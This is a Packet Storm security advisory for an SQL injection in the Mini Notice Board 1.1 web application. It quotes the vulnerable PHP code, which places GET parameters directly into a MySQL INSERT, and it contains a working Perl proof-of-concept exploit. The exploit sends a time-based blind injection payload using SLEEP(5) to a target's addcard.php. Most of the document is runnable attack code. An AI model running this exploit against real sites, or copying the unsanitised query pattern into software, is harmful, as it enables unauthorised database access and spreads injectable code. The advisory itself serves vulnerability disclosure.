Mini Notice Board 1.1 SQL Injection

2016-11-02T00:00:00
ID PACKETSTORM:139477
Type packetstorm
Reporter N_A
Modified 2016-11-02T00:00:00

Description

                                        
                                            `#!/usr/bin/perl -w  
  
#mininoticeboard_v1.1 SQL Injection Exploit  
#==========================================  
  
  
#Discovered by N_A , N_A[at]tutanota.com  
#========================================  
  
  
#Vendor has been notified  
#=========================  
  
  
#Description  
#============  
  
#Mini Notice Board is a small noticeboard application that allows users to post notice cards online. e.g. if people want to sell their car   
#or lawnmower or want to provide services, they can simply write a card.   
#It supports unlimited Regions.  
  
#https://sourceforge.net/projects/mininoticeboard/  
  
  
#Vulnerability  
#=============  
  
#addcard.php:  
  
#The variables from the GET request are fed unsanitized directly into the MYSQL database resulting in an SQL Injection  
  
#$title = $_GET["title"];  
#$body = $_GET["body"];  
#$contact = $_GET["contact"];  
#$address = $_GET["address"];  
#$tel = $_GET["tel"];  
#$date_day = date("d");  
#$date_month = date("m");  
#$date_year = date("y");  
#$romovalcode = genremovalcode();  
#$categorie = $cid;  
  
#if($title!="" && $body!="" && $tel!="" && $contact!="")  
  
#{  
  
# include 'dbconnect.php';  
# $sqlset["tablename"] = $sqlset["tableprefix"].'content';  
# mysql_query('INSERT INTO `'.$sqlset["tablename"].'` (`title`, `content`, `contact`, `address`, `tel`, `date_day`, `date_month`, `date_year`, #`removalcode`, `categorie`) VALUES (\''.$title.'\', \''.$body.'\', \''.$contact.'\', \''.$address.'\', \''.$tel.'\', \''.$date_day.'\',   
#\''$date_month.'\', \''.$date_year.'\', \''.$romovalcode.'\', \''.$categorie.'\')') or $status = 'red';  
  
  
  
  
#Proof Of Concept Exploit attached below  
  
#N_A, N_A[at]tutanota.com  
  
  
  
  
use strict;  
use LWP::Simple;  
  
  
my ($url) = @ARGV;  
if( not defined $url )  
{   
  
print "=========================================\n";  
print "Mini Notice Board SQL Injection Exploit\n";  
print "\tBy N_A\n";  
print "\n";  
print "$0 [URL]\n";  
print "$0 127.0.0.1/mininoticeboard\n";  
print "=========================================\n";  
exit;  
}  
  
  
my $file = '/addcard.php'; #The Vulnerable .php file  
my $injection = 'title=pentest&body=blah\' OR (SELECT * FROM (SELECT(SLEEP(5)))jAEh) AND \'OKSG\'=\'OKSG&tel=555&contact=blahblah&address=blahblah&submit=Add+Card';   
  
  
my $request ="http://".$url.$file."?".$injection; #Forming the exploit string  
my $content = get $request;  
die "Could not get $request" unless defined $content;  
  
#It should hang here for about 5 seconds..... (SLEEP(5)) as per injection  
  
print "##########################\n";  
print "SQL Injection Successful!\n";  
print "##########################\n"  
  
  
`